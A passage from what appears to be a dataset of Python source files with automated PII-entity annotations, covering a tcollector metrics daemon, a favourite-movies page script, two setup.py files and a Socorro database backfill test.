doing + # this... 
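+ # (one possible sketch, not implemented here: key COLLECTORS by the + # (colname, interval) pair instead of the bare name, so the same script + # name under two interval directories would no longer collide)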
+ if col.interval != interval: + LOG.error('two collectors with the same name %s and ' + 'different intervals %d and %d', + colname, interval, col.interval) + continue + + # we have to increase the generation or we will kill + # this script again + col.generation = GENERATION + if col.mtime < mtime: + LOG.info('%s has been updated on disk', col.name) + col.mtime = mtime + if not col.interval: + col.shutdown() + LOG.info('Respawning %s', col.name) + register_collector(Collector(colname, interval, + filename, mtime)) + else: + register_collector(Collector(colname, interval, filename, + mtime)) + + # now iterate over everybody and look for old generations + to_delete = [] + for col in all_collectors(): + if col.generation < GENERATION: + LOG.info('collector %s removed from the filesystem, forgetting', + col.name) + col.shutdown() + to_delete.append(col.name) + for name in to_delete: + del COLLECTORS[name] + + +if __name__ == '__main__': + sys.exit(main(sys.argv)) +",58560,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Mark Smith dummy@email.com'], ['DATE_TIME', 'September 2020'], ['PERSON', 'Args'], ['LOCATION', 'del self.values[key]'], ['LOCATION', 'self.datalines.append(line.rstrip'], ['PERSON', 'Args'], ['DATE_TIME', 'this many seconds'], ['PERSON', 'Parses'], ['DATE_TIME', 'every 10 minutes'], ['DATE_TIME', 'the beginning/end'], ['DATE_TIME', 'Fall'], ['PERSON', 'dryrun'], ['PERSON', 'Args'], ['PERSON', 'dryrun'], ['DATE_TIME', 'seconds'], ['PERSON', 'hostport'], ['LOCATION', 'self.host'], ['PERSON', ""LOG.info('Blacklisting""], ['LOCATION', 'self.host'], ['DATE_TIME', '5\n seconds'], ['DATE_TIME', '5 more seconds'], ['PERSON', 'self.maintain_conn'], ['PERSON', 'SenderThread'], ['PERSON', 'SenderThread'], ['DATE_TIME', 'less than a minute ago'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['PERSON', 'LOG.debug(""Sending'], ['URL', 'LOG.de'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['URL', 'LOG.de'], ['URL', 'urllib2.HT'], ['URL', 'LOG.er'], ['PERSON', 'LOG.addHandler(ch'], ['LOCATION', 'parse_cmdline(argv'], ['PERSON', 'Parses'], ['PERSON', ""metavar='HOST""], ['PERSON', ""metavar='FILE""], ['DATE_TIME', 'seconds'], ['LOCATION', ""metavar='EVICTINTERVAL""], ['DATE_TIME', 'seconds'], ['LOCATION', ""dest='allowed_inactivity_time""], ['DATE_TIME', ""help='Remove""], ['PERSON', 'max'], ['PERSON', ""type='str""], ['DATE_TIME', 'seconds'], ['PERSON', ""help='The""], ['PERSON', ""dest='http_password""], ['DATE_TIME', ""at least 0 seconds'""], ['DATE_TIME', ""at least 0 seconds'""], ['PERSON', 'mydir = os.path.dirname(collector_dir'], ['PERSON', 'libdir = os.path.join(mydir'], ['PERSON', ""LOG.fatal('No""], ['PERSON', 'options.cdir'], ['LOCATION', 'options.http_username'], ['PERSON', 'all_living_collectors'], ['PERSON', 'time.sleep(15'], ['PERSON', 'all_living_collectors'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'Args'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'del modules[path'], ['DATE_TIME', 'the past hour'], ['PERSON', 'currenty'], ['DATE_TIME', 'seconds'], ['DATE_TIME', 'seconds'], ['LOCATION', 'fcntl'], ['LOCATION', 'fcntl'], ['LOCATION', ""os.listdir('%s/%d""], ['PERSON', 'X_OK'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['LOCATION', 'del COLLECTORS[name]'], ['URL', 
'http://www.gnu.org/licenses/'], ['URL', 'tcollector.py'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'collector.na'], ['URL', 'collector.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.sh'], ['URL', 'collector.na'], ['URL', 'LOG.er'], ['URL', 'self.na'], ['URL', 'self.int'], ['URL', 'self.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.ne'], ['URL', 'self.ki'], ['URL', 'self.de'], ['URL', 'self.mt'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.la'], ['URL', 'self.proc.stderr.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.na'], ['URL', 'self.proc.stdout.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.buffer.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'LOG.in'], ['URL', 'self.pro'], ['URL', 'self.na'], ['URL', 'time.sl'], ['URL', 'self.pro'], ['URL', 'signal.SI'], ['URL', 'self.pro'], ['URL', 'self.values.ke'], ['URL', 'self.va'], ['URL', 'self.va'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'sys.stdin.re'], ['URL', 'line.rs'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.de'], ['URL', 'LOG.de'], ['URL', 'col.co'], ['URL', 'self.pro'], ['URL', 'self.de'], ['URL', 'time.sl'], ['URL', 'self.li'], ['URL', 'col.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 're.ma'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'parsed.gr'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'col.va'], ['URL', 'self.li'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'tags.it'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'random.sh'], ['URL', 'self.cu'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'random.sh'], ['URL', 'hosts.cl'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'hosts.ad'], ['URL', 'self.ma'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.ht'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'socket.er'], ['URL', 'self.tsd.re'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'self.se'], ['URL', 'self.la'], ['URL', 'self.ht'], ['URL', 'self.ve'], ['URL', 'LOG.de'], ['URL', 'time.sl'], ['URL', 
'socket.ge'], ['URL', 'socket.AF'], ['URL', 'socket.SO'], ['URL', 'socket.ga'], ['URL', 'LOG.de'], ['URL', 'socket.so'], ['URL', 'self.tsd.se'], ['URL', 'self.tsd.co'], ['URL', 'LOG.de'], ['URL', 'socket.er'], ['URL', 'self.tsd.cl'], ['URL', 'LOG.er'], ['URL', 'self.se'], ['URL', 'self.ht'], ['URL', 'self.se'], ['URL', 'logging.DE'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'LOG.de'], ['URL', 'self.ad'], ['URL', 'self.se'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'self.se'], ['URL', 'socket.er'], ['URL', 'LOG.er'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'tags.st'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'tags.it'], ['URL', 'LOG.er'], ['URL', 'urllib2.Re'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'response.ge'], ['URL', 'self.se'], ['URL', 'response.ge'], ['URL', 'LOG.se'], ['URL', 'logging.IN'], ['URL', 'logging.St'], ['URL', 'sys.st'], ['URL', 'ch.se'], ['URL', 'logging.Fo'], ['URL', 'LOG.ad'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'sys.ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.re'], ['URL', 'parser.er'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ba'], ['URL', 'os.fo'], ['URL', 'os.ch'], ['URL', 'os.se'], ['URL', 'os.fo'], ['URL', 'os.de'], ['URL', 'os.de'], ['URL', 'stdin.fi'], ['URL', 'stdout.fi'], ['URL', 'stdout.fi'], ['URL', 'stdin.cl'], ['URL', 'stdout.cl'], ['URL', 'os.cl'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.environ.ge'], ['URL', 'LOG.de'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ve'], ['URL', 'LOG.se'], ['URL', 'logging.DE'], ['URL', 're.ma'], ['URL', 'options.st'], ['URL', 'socket.ge'], ['URL', 'options.cd'], ['URL', 'os.path.re'], ['URL', 'options.cd'], ['URL', 'os.path.is'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'atexit.re'], ['URL', 'signal.SI'], ['URL', 'signal.SI'], ['URL', 'signal.si'], ['URL', 'options.de'], ['URL', 'reader.st'], ['URL', 'options.no'], ['URL', 'options.re'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ma'], ['URL', 'sender.st'], ['URL', 'LOG.in'], ['URL', 'options.st'], ['URL', 'sys.stdin.cl'], ['URL', 'col.sh'], ['URL', 'LOG.de'], ['URL', 'reader.jo'], ['URL', 'LOG.de'], ['URL', 'sender.jo'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'options.cd'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'os.path.is'], ['URL', 'os.li'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'os.path.jo'], ['URL', 'modules.it'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 
'os.path.ge'], ['URL', 'os.ge'], ['URL', 'f.cl'], ['URL', 'COLLECTORS.it'], ['URL', 'col.de'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'os.ki'], ['URL', 'LOG.in'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'col.la'], ['URL', 'options.al'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.sh'], ['URL', 'options.re'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 're.se'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.fi'], ['URL', 'os.se'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.la'], ['URL', 'col.proc.stdout.fi'], ['URL', 'col.proc.stderr.fi'], ['URL', 'col.pro'], ['URL', 'col.de'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.int'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'os.li'], ['URL', 'interval.is'], ['URL', 'os.li'], ['URL', 'colname.st'], ['URL', 'os.path.is'], ['URL', 'os.ac'], ['URL', 'os.path.ge'], ['URL', 'col.int'], ['URL', 'LOG.er'], ['URL', 'col.int'], ['URL', 'col.ge'], ['URL', 'col.mt'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.mt'], ['URL', 'col.int'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.ge'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.sh'], ['URL', 'col.na'], ['URL', 'sys.ar']]" +15,"import media +import fav_movies_web + +# Instances of my favorite movies: + +# Deadpool movie: movie title, storyline, poster image and movie trailer +deadpool = media.Movie(""Deadpool"", + """""" Wade Wilson (Ryan Reynolds) is a former Special Forces + operative who now works as a mercenary. His world comes + crashing down when evil scientist Ajax (Ed Skrein) + tortures, disfigures and transforms him into Deadpool. + The rogue experiment leaves Deadpool with accelerated + healing powers and a twisted sense of humor. With help + from mutant allies Colossus and Negasonic Teenage + Warhead (Brianna Hildebrand), Deadpool uses his new + skills to hunt down the man who nearly destroyed + his life"""""", + ""https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"", # NOQA + ""https://www.youtube.com/watch?v=Xithigfg7dA"" + ) # NOQA + +# Focus movie: movie title, storyline, poster image and movie trailer +focus = media.Movie(""Focus"", + """"""Nicky (Will Smith), a veteran con artist, takes a + novice named Jess (Margot Robbie) under his wing.
While + Nicky teaches Jess the tricks of the trade, the pair + become romantically involved; but, when Jess gets + uncomfortably close, Nicky ends their relationship."""""", + ""http://static.rogerebert.PI:KEY.jpg"", # NOQA + ""https://www.youtube.com/watch?v=MxCRgtdAuBo"" + ) # NOQA + +# Mechanic: Resurrection movie: movie title, storyline, poster image and +# movie trailer +mechanic = media.Movie(""Mechanic: Resurrection"", + """"""Living under cover in Brazil, master assassin Arthur + Bishop (Jason Statham) springs back into action after an + old enemy (Sam Hazeldine) kidnaps the woman (Jessica Alba) + he loves. To save her life, Bishop must kill an + imprisoned African warlord, a human trafficker (Toby + Eddington) and an arms dealer (Tommy Lee Jones), all + while making the deaths look like accidents. When things + don't go exactly as planned, Bishop turns the tables on + the people who forced him out of retirement."""""", + ""https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"", # NOQA + ""https://www.youtube.com/watch?v=G-P3f_wDXvs"" + ) # NOQA + +# Enemy movie: movie title, storyline, poster image and movie trailer +enemy = media.Movie(""Enemy"", + """"""A mild-mannered college professor (Jake Gyllenhaal) + discovers a look-alike actor and delves into the other + man's private affairs."""""", + ""http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"", # NOQA + ""https://www.youtube.com/watch?v=FJuaAWrgoUY"" + ) # NOQA + +# Wonder Woman movie: movie title, storyline, poster image and movie trailer +wonder_woman = media.Movie(""Wonder Woman"", + """"""Before she was Wonder Woman (Gal Gadot), she was + Diana, princess of the Amazons, trained to be an + unconquerable warrior. Raised on a sheltered island + paradise, Diana meets an American pilot (Chris Pine) + who tells her about the massive conflict that's + raging in the outside world. Convinced that she can + stop the threat, Diana leaves her home for the first + time. Fighting alongside men in a war to end + all wars, she finally discovers her full powers and + true destiny"""""", + ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"", # NOQA + ""https://www.youtube.com/watch?v=1Q8fG0TtVAY"" + ) # NOQA + +# Ghost in the Shell movie: movie title, storyline, poster image and movie +# trailer +ghost_in_the_shell = media.Movie(""Ghost in the Shell"", + """"""In the near future, Major is the first of + her kind: a human who is cyber-enhanced to be a + perfect soldier devoted to stopping the world's + most dangerous criminals. When terrorism + reaches a new level that includes the ability + to hack into people's minds and control them, + Major is uniquely qualified to stop it. As + she prepares to face a new enemy, Major + discovers that her life was stolen instead of + saved.
Now, she will stop at nothing to + recover her past while punishing those who did + this to her."""""", + ""http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"", # NOQA + ""https://www.youtube.com/watch?v=G4VmJcZR0Yg"" + ) # NOQA + +# All instances grouped together in a list +# The list is the set of movies that will be passed to fav_movies_web below +movies = [ + deadpool, + focus, + mechanic, + enemy, wonder_woman, + ghost_in_the_shell +] + +# Open the HTML file in a web browser via fav_movies_web.py +fav_movies_web.open_movies_page(movies) # the array/list (argument) +",4766,"[['PERSON', 'sotryline'], ['PERSON', 'Wade Wilson'], ['PERSON', 'Ryan Reynolds'], ['PERSON', 'Ajax'], ['PERSON', 'Ed Skrein'], ['PERSON', 'Deadpool'], ['PERSON', 'Brianna Hildebrand'], ['PERSON', 'Deadpool'], ['PERSON', 'sotryline'], ['PERSON', 'Nicky'], ['PERSON', 'Will Smith'], ['PERSON', 'Jess(Margot Robbie'], ['PERSON', 'Nicky'], ['PERSON', 'Jess'], ['PERSON', 'Jess'], ['PERSON', 'Nicky'], ['PERSON', 'sotryline'], ['LOCATION', 'Brazil'], ['PERSON', 'Arthur\n Bishop(Jason Statham'], ['PERSON', 'Hazeldine'], ['PERSON', 'Jessica Alba'], ['NRP', 'African'], ['PERSON', 'Tommy Lee Jones),all'], ['PERSON', 'sotryline'], ['PERSON', 'Movie(""Enemy'], ['PERSON', 'Jake Gyllenhaal'], ['PERSON', 'sotryline'], ['PERSON', 'Gal Gadot'], ['PERSON', 'Diana'], ['PERSON', 'Diana'], ['NRP', 'American'], ['PERSON', 'Chris Pine'], ['PERSON', 'Diana'], ['PERSON', 'herhome'], ['PERSON', 'sotryline'], ['URL', 'https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=Xithigfg7dA""'], ['URL', 'http://static.ro'], ['URL', 'https://www.youtube.com/watch?v=MxCRgtdAuBo""'], ['URL', 'https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=G-P3f_wDXvs""'], ['URL', 'http://www.impawards.com/intl/misc/2014/posters/enemy.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=FJuaAWrgoUY""'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=1Q8fG0TtVAY""'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg"",'], ['URL', 'https://www.youtube.com/watch?v=G4VmJcZR0Yg""'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'KEY.jp'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'web.py']]" +16,"#!/usr/bin/env python + +import glob +import numpy as np +try: + from setuptools import setup + have_setuptools = True +except ImportError: + from distutils.core import setup + have_setuptools = False + +try: + from Cython.Build import cythonize + have_cython = True +except ImportError: + have_cython = False + +kwargs = {'name': 'openmc', + 'version': '0.8.0', + 'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model', + 'openmc.stats'], + 'scripts': glob.glob('scripts/openmc-*'), + + # Metadata + 'author': 'Will Boyd', + 'author_email': dummy@email.com', + 'description': 'OpenMC Python API', + 'url': 'https://github.com/mit-crpg/openmc', + 'classifiers': [ + 'Intended Audience :: Developers', + 'Intended Audience :: End Users/Desktop', + 'Intended Audience :: Science/Research', + 'License :: OSI Approved :: MIT License', + 'Natural Language :: English', + 'Programming Language :: Python', + 'Topic :: Scientific/Engineering' + ]} + +if 
have_setuptools: + kwargs.update({ + # Required dependencies + 'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'], + + # Optional dependencies + 'extras_require': { + 'decay': ['uncertainties'], + 'pandas': ['pandas>=0.17.0'], + 'sparse' : ['scipy'], + 'vtk': ['vtk', 'silomesh'], + 'validate': ['lxml'] + }, + + # Data files + 'package_data': { + 'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5'] + }, + }) + +# If Cython is present, add resonance reconstruction capability +if have_cython: + kwargs.update({ + 'ext_modules': cythonize('openmc/data/reconstruct.pyx'), + 'include_dirs': [np.get_include()] + }) + +setup(**kwargs) +",1920,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://github.com/mit-crpg/openmc',""], ['PERSON', 'openmc'], ['PERSON', ""Will Boyd'""], ['PERSON', 'lxml'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'distutils.co'], ['URL', 'openmc.mg'], ['URL', 'openmc.mo'], ['URL', 'openmc.st'], ['URL', 'glob.gl'], ['URL', 'email.com'], ['URL', 'mass.ma'], ['URL', 'reconstruct.py'], ['URL', 'np.ge']]" +17,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +import os +import codecs +from setuptools import setup + + +def read(fname): + file_path = os.path.join(os.path.dirname(__file__), fname) + return codecs.open(file_path, encoding='utf-8').read() + + +setup( + name='pytest-concurrent', + version='0.2.2', + author='James Wang, Reverb Chu', + author_email='jamesw96@uw.edu, dummy@email.com', + maintainer='James Wang, Reverb Chu', + maintainer_email='jamesw96@uw.edu, dummy@email.com', + license='MIT', + url='https://github.com/reverbc/pytest-concurrent', + description='Concurrently execute test cases with multithread' + ', multiprocess and gevent', + long_description=read('README.rst'), + packages=['pytest_concurrent', 'pytest_concurrent.modes'], + install_requires=[ + 'pytest>=3.1.1', + 'psutil>=5.2.2'], + classifiers=[ + 'Development Status :: 4 - Beta', + 'Framework :: Pytest', + 'Intended Audience :: Developers', + 'Topic :: Software Development :: Testing', + 'Programming Language :: Python', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5', + 'Programming Language :: Python :: 3.6', + 'Programming Language :: Python :: 3.7', + 'Programming Language :: Python :: Implementation :: CPython', + 'Operating System :: OS Independent', + 'License :: OSI Approved :: MIT License', + ], + entry_points={ + 'pytest11': [ + 'concurrent = pytest_concurrent.plugin', + ], + }, + setup_requires=['pytest-runner'], + tests_require=['pytest'], +) +",1681,"[['EMAIL_ADDRESS', ""author_email='jamesw96@uw.edu""], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', ""maintainer_email='jamesw96@uw.edu""], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""author='James Wang""], ['PERSON', ""Reverb Chu'""], ['PERSON', ""maintainer='James Wang""], ['PERSON', ""Reverb Chu'""], ['URL', ""https://github.com/reverbc/pytest-concurrent',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'README.rs'], ['URL', 'concurrent.mo'], ['URL', 'concurrent.pl']]" +18,"# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. 
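+ +# Note: the test case below is tagged with @attr(integration='postgres'), +# so with the nose attrib plugin it can be selected from the command line, +# e.g. (illustrative): nosetests -a integration=postgres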
+ +from .unittestbase import PostgreSQLTestCase +from nose.plugins.attrib import attr +from nose.tools import eq_, assert_raises +import datetime + +from socorro.external.postgresql.backfill import Backfill +from socorro.external.postgresql import staticdata, fakedata +from socorro.external import MissingArgumentError +from socorro.lib import datetimeutil + + +#============================================================================== +@attr(integration='postgres') +class TestBackfill(PostgreSQLTestCase): + """"""Tests the calling of all backfill functions"""""" + + #-------------------------------------------------------------------------- + def setUp(self): + """""" Populate tables with fake data """""" + super(TestBackfill, self).setUp() + + cursor = self.connection.cursor() + + self.tables = [] + + for table in staticdata.tables + fakedata.tables: + # staticdata has no concept of duration + if table.__module__ == 'socorro.external.postgresql.staticdata': + table = table() + else: + table = table(days=1) + table.releases = { + 'WaterWolf': { + 'channels': { + 'Nightly': { + 'versions': [{ + 'number': '18.0', + 'probability': 0.5, + 'buildid': '%s000020' + }], + 'adu': '10', + 'repository': 'nightly', + 'throttle': '1', + 'update_channel': 'nightly', + }, + }, + 'crashes_per_hour': '5', + 'guid': dummy@email.com' + }, + 'B2G': { + 'channels': { + 'Nightly': { + 'versions': [{ + 'number': '18.0', + 'probability': 0.5, + 'buildid': '%s000020' + }], + 'adu': '10', + 'repository': 'nightly', + 'throttle': '1', + 'update_channel': 'nightly', + }, + }, + 'crashes_per_hour': '5', + 'guid': dummy@email.com' + } + } + + + table_name = table.table + table_columns = table.columns + values = str(tuple([""%("" + i + "")s"" for i in table_columns])) + columns = str(tuple(table_columns)) + self.tables.append(table_name) + + # TODO: backfill_reports_clean() sometimes tries to insert a + # os_version_id that already exists + if table_name is not ""os_versions"": + for rows in table.generate_rows(): + data = dict(zip(table_columns, rows)) + query = ""INSERT INTO %(table)s "" % {'table': table_name} + query = query + columns.replace(""'"", """").replace("",)"", "")"") + query = query + "" VALUES "" + query = query + values.replace("",)"", "")"").replace(""'"", """") + + cursor.execute(query, data) + self.connection.commit() + + #-------------------------------------------------------------------------- + def tearDown(self): + """""" Cleanup the database, delete tables and functions """""" + + cursor = self.connection.cursor() + tables = str(self.tables).replace(""["", """").replace(""]"", """") + cursor.execute(""TRUNCATE "" + tables.replace(""'"", """") + "" CASCADE;"") + + self.connection.commit() + self.connection.close() + + super(TestBackfill, self).tearDown() + + #-------------------------------------------------------------------------- + def setup_data(self): + + self.now = datetimeutil.utc_now() + now = self.now.date() + yesterday = now - datetime.timedelta(days=1) + lastweek = now - datetime.timedelta(days=7) + now_str = datetimeutil.date_to_string(now) + yesterday_str = datetimeutil.date_to_string(yesterday) + lastweek_str = datetimeutil.date_to_string(lastweek) + + self.test_source_data = { + # Test backfill_adu + 'adu': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_all_dups + 'all_dups': { + 'params': { + ""start_date"": yesterday_str, + ""end_date"": now_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_build_adu + 
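+ # (same params/res_expected shape as the entries above; test_get below + # feeds each entry to backfill.get and compares the first result row)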
